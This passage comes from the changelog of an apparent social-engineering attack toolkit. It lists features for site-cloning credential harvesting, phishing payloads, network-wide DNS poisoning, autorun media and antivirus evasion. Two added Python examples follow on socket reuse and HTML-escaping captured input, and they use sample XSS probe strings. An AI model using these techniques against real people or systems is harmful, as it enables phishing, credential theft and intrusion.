windows/browser/ms10_042_helpctr_xss_cmd_exec * Added the MS10-XXX LNK file exploit from Metasploit, is now incorporated into the Client-Side Attack vector * Added defaults to the client-side attack vector, so just hitting return will default to 
meterpreter and the latest exploit * Removed the ability to perform tabnabbing and web templates, only clone method supported * Fixed when webdav is being used the HTTP 8080 server of the cloned site wouldn't run properly * Fixed when client-side attack exploit windows/browser/ms10_042_helpctr_xss_cmd_exec would fail and not load properly through webdav * Fixed issue where Apache and python-based web server was not properly running under Teensy USB HID attack * Changed name from Infectious USB/DVD/CD to Infectious Media Generator * Fixed a bug with the Java Applet attack vector where Apache mode wasnt working properly * Fixed the BeautifulSoup response to ensure it fails out if invalid responses are given * Fixed an issue where BeautifulSoup and PExpect would not clean up properly after installation * Changed timing on Teensy PowerShell/WSCRIPT attack method to be faster ~~~~~~~~~~~~~~~~~ version 0.5 ~~~~~~~~~~~~~~~~~ * Added better FireFox user agent impersonation through web cloner * Rehauled the entire web_server to handle multiple request types (ie POST) * Removed the single host target for Ettercap and allow you to DNS poison the entire network now for a larger capability for the attack. * Rehauled the Ettercap functionality to allow entire network ranges for select websites or any websites * Removed the certificate check for FQDN mismatches, no need to keep them in when cloning site * Added a whole new attack method through the web cloning, this will allow you to clone a website with username and password fields and automatically harvest those credentials. * Added a reporting engine to the credential harvest, looking at expanding to other attack methods. 
* Added more description to the payload creation option within SET and moved it to the root SET directory * Added the ability to utilize predefined templates within the SET web attack now, and expanded it to multiple templates * Added the ability to utilize backdoored executables (-x) in MSF to better get around A/V. This option is available through all of the payload generation capabilities. * Added XML based format for the report export in the website harvester, pretty simple xml format for anyone that needs it * Added CD/DVD/USB infectious method, will allow you to create a simple autorun.inf you can burn and use in an se attack * Fixed bug when reloading a menu after previously loaded * Fixed bug where credential harvester server would not properly terminate when issuing Contorl-C * Fixed bug where when cloning certain sites it would duplicate the payload and execute twice * Fixed where aurora exploit was changed in MSF but not in SET * Fixed iepeers description in msf and removed win32hlp exploit * Added the ability to import your own PDF now in the Spear Phishing menu * Moved around the changelog to reflect newest changes first in the changelog * Added the MS10-018 IE Tabular ActiveX Memory Corruption Exploit * Changed update_set to set-update * Added robust checking for custom PDF in spear-phishing attack, if no file is found it will default. * Added defaults to spear-phishing attack menus * Added the ability to just use the mass mailer options by itself without having to do it through an attack vector * Fixed bugged when using the payload creation, would cause corrupt executable * Fixed when a server was already bound to 80 in harvester and error message was not displayed properly * Fixed a major bug with the credential harvester, should POST and redirect properly now. * Added automigrate to payloads so when the user closes the browser, it doesn't close the active session. 
* Fixed bug in infectious usb method where payload was corrupt * Used a non-console application for -x flag in msf, causes there to be no popup now * Added better path detection for iTouch * Added compatibility with iPad, iTouch, iPhone, etc. etc. * Added an interface IP when AUTO_DETECT=OFF to detect both reverse IP and interface IP in scenarios where the interface IP will be different from the listener IP ~~~~~~~~~~~~~~~~~~ version 0.4.1 ~~~~~~~~~~~~~~~~~~ * Added multi-encoder options by default and option 15 in the web attack, this is much better for A/V bypassing. * Added the meterpreter ALL PORTS egress attack which slowly connects to every port in order to find one that works * Fixed a couple wording changes that may be confusing * Fixed issue where HTTPServer was not properly closing when exiting SET * Over 25 different menu bug fixes * Added mass obfuscation of payload delivery in the Java Applet, should make harder for signatures to be written * Fixed a bug where web server would not properly quit if you did not fully exit SET * Fixed a bug where the new multi-encoder would not properly be specified when using the 15 number option on web attack * Added the latest IE F1 VBScript exploit to the web attack vector * Added the latest IE Insecure Scripting Misconfiguration attack to web attack vector * Removed the option when creating emails to create the payload now * Added a default to port 443 if null is specified during email attack * Added the ability to customize the web server listening port so it isn't always listening on 80 if you dont want it to * Added the ability to auto detect IP addresses for RHOST within spear phishing controlled through SET_CONFIG and AUTO_DETECT=ON/OFF * Added the ability to create a one time email attack or import the template, don't always have to create a template now * Added default payload if null is specified during email attack * Bug fix on cloning certain websites with no .extension prefix, thanks JWYNN! 
* Fixed where https wasn't parsed properly when cloning website * Added the iepeers zero-day from MSF to SET * Added the ability to use import your own site with cred harvester ~~~~~~~~~~~~~~~~~~ version 0.4 ~~~~~~~~~~~~~~~~~~ * Incorporated Thomas Werth's unpublished Java Applet attack that no longer utilizes VBS script and is multi platform including Linux, Windows, and OSX. * Allow you to now self-sign your certificates from whatever you want, will need to install openjdk-6 before using this though, edit the set_config to enable this feature. * Fixed bug where newlines were not showing up properly when emailing something * Fixed bug where GMAIL sometimes requires TLS, it will detect if TLS is needed and utilize this * Rewrote the majority of the web server handler, now utilizes forked simplehttpserver in python and can dynamically import anything now, much easier method for handling multiple files now. * Added two payload delivery options for OSX and Linux in the Java Applet attack, you can now select if you want to create a Lin/OSX payload and have them deployed via the Java Applet. Currently only supports reverse_tcp shells. * Bug fixed template creation where when it dynamically imported newlines would be messed up. * Based on Hak5 and Mubix, I have changed it so that the website and listener is up and running before the emails are sent out. I simply create a child thread that interacts in the background and if the set_config option for WEBMAIL_ATTACK=ON, it will call that variable and allow you to send emails out while the listener and website runs in the background. As soon as your finished with the email, it will then interact with the child process and allow you to interact. * Added Metasploit browser exploits into the website attack vector, this will allow you to utilize the web cloning or pre-defined template in SET and select either a Java Applet method, or Metasploit Browser exploits. 
* Minor wording change in the payload gen, it said choice 1-4 where the choice was 1-8 * Fixed the import your own executable or payload within payloadgen * Fixed the solo payload and listener option (number 5) * Fixed a number of bugs on the interface, thanks to everyone for reporting * Added OSX support to SET, web clone should now fully work * Fixed a couple of bugs where the website wouldnt properly clone if it was php or asp ~~~~~~~~~~~~~~~~~~~ version 0.3 ~~~~~~~~~~~~~~~~~~ * Added x64 payloads for website attack * Added select your own executable for website attack * Added option to clone an entire website and inject applets into them * Fixed a few minor bugs with payload selection * Allow you to specify "0" for encoding without erroring out * Moved the SENDMAIL flag to the set_config instead of its own config file * Added much more description on how to modify the set_config file in the file itself * Moved CREDITS to readme instead of the credits folder * Incorporated a skip for encoding if x64 based * Allow you to import your own website into SET for web attack * Added adobe flatdecode predictor02 integer overflow exploit from MSF * Fixed a couple of menu bugs where it wouldn't properly exit * Added better error handling * Added the adobe newMedia zero day adobe pdf attack for emails * Templates are now dynamically imported into SET, you can add your own email templates now through the templates folder in the set root or you can enter them through SET itself. 
* Fixed a bug with ARP_Cache poisoning not working if set to ON * Made Shikata_Ga_Nai the default for web attack * Added x64 Meterpreter compatibility with web attack * Fixed bugs in custom exe to vba via rar delivery * Added more payload delivery options to email attack including x64 bind, reverse, and meterpreter * Added automatic encoding options for the VBA to EXE attack via E-Mail * Added a flag option in set_config for ettercap to select interface, handy if ettercap can't determine interface to use, simply change the set_config flag option ETTERCAP_INTERFACE=NONE to ETTERCAP_INTERFACE=wlan0 or whatever. * Added some fun menus when you log into SET that rotate to different ASCII art * Added some coloring into SET, more on this to come, this is only the beginning * Added the option in config/set_config WEBATTACK_EMAIL=OFF you can send emails first then setup the fake website to help with phishing, doesn't require a payload now * Added 4 count on encoding instead of 3 for web attack and payloadgen * Removed the need for xterm on web attack and rely off of pexpect now, this allows you to run set from a 1 console type deal, plus there was a lot of people having issues with xterm in general. * Fixed a bug with cloner that would not clone sites properly that use aspx as their homepage (thanks Emgent)
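The version 1.0 entry about the Python web server and the TIME_WAIT socket describes a general socket-programming pitfall: the side that closes a TCP connection first keeps the port reserved in TIME_WAIT for a while, so a server that exits and restarts immediately fails to bind unless the new listening socket sets SO_REUSEADDR. The following is an added example written for this changelog, not code from SET itself; it reproduces the problem and the fix on the loopback interface with a throwaway port chosen by the kernel (all names in it are this example's own).

```python
import socket

HOST = "127.0.0.1"  # loopback only; nothing here leaves the machine


def _serve_one_request(listener: socket.socket) -> None:
    """Serve a single loopback client and let the SERVER close first.

    The side that closes first owns the TIME_WAIT entry, so after this call
    the kernel keeps a socket on the listener's port for up to 2*MSL."""
    port = listener.getsockname()[1]
    client = socket.create_connection((HOST, port))
    conn, _ = listener.accept()
    conn.sendall(b"HTTP/1.0 200 OK\r\n\r\nok")
    conn.close()  # active close: the server side enters TIME_WAIT
    client.recv(64)
    client.close()


def rebind_after_use(reuse: bool) -> bool:
    """Run one connection on a fresh port, close the listener, then bind the
    same port again right away. Returns True if the second bind succeeded."""
    first = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    # The kernel only lets a new socket overlap a lingering one when both
    # carry SO_REUSEADDR, so the first listener always sets it; what varies
    # between the two calls is only the second, re-bound socket.
    first.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    first.bind((HOST, 0))  # port 0: let the kernel pick a free port
    first.listen(1)
    port = first.getsockname()[1]
    _serve_one_request(first)
    first.close()

    second = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    if reuse:
        second.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    try:
        second.bind((HOST, port))
        second.listen(1)
        return True
    except OSError:
        # EADDRINUSE: the previous connection still owns the port.
        return False
    finally:
        second.close()


if __name__ == "__main__":
    print("rebind without SO_REUSEADDR:", rebind_after_use(False))
    print("rebind with SO_REUSEADDR:   ", rebind_after_use(True))
```

When the server is built on Python's socketserver, the same fix is the class attribute `allow_reuse_address = True` (TCPServer defaults it to False; http.server's HTTPServer already sets it), which makes server_bind apply SO_REUSEADDR before binding. SO_REUSEADDR only relaxes the conflict with a connection in a closing state; it does not let two live listeners share a port, so it does not weaken the "port already in use" check that protects against a second instance silently hijacking traffic.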
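The version 0.6.1 entry that adds cgi.escape to the file-write output is an output-encoding fix: whatever a visitor types into a captured form is attacker-controlled, and writing it verbatim into an HTML report means the report itself carries live markup for whoever opens it. The following is an added example for this changelog, not SET's own reporting code; it shows the pre-fix pattern beside the escaped form and checks that injected markup does not survive. The function names and the sample submission are this example's own, and the sample is constructed, not captured data.

```python
import html


def render_entry_unsafe(fields: dict) -> str:
    """The pre-fix pattern: captured form fields written into the HTML report
    verbatim. A value such as <script>...</script> becomes live markup for
    whoever opens the report in a browser."""
    cells = "".join(f"<td>{k}</td><td>{v}</td>" for k, v in fields.items())
    return f"<tr>{cells}</tr>"


def render_entry_safe(fields: dict) -> str:
    """The hardened form: every key and value is HTML-escaped, quotes included,
    so attacker-controlled input is displayed as text, never parsed as markup."""
    cells = "".join(
        f"<td>{html.escape(str(k), quote=True)}</td>"
        f"<td>{html.escape(str(v), quote=True)}</td>"
        for k, v in fields.items()
    )
    return f"<tr>{cells}</tr>"


def contains_raw_markup(rendered: str, probes) -> bool:
    """Report-side check: does any raw probe string survive unescaped?"""
    return any(p in rendered for p in probes)


# Constructed sample submission (not real captured data): a script tag in one
# field and an attribute breakout in the other.
SAMPLE_FIELDS = {
    "username": "<script>alert(1)</script>",
    "password": '" onmouseover="alert(2)',
}
PROBES = ("<script>", 'onmouseover="')

if __name__ == "__main__":
    print(render_entry_unsafe(SAMPLE_FIELDS))
    print(render_entry_safe(SAMPLE_FIELDS))
```

One caveat worth knowing when reading the original entry: Python 2's cgi.escape escaped only `<`, `>` and `&` unless called with quote=True, so a value like the second sample field could still break out of an attribute; html.escape in Python 3 escapes both quote characters by default and is the replacement since cgi.escape was removed.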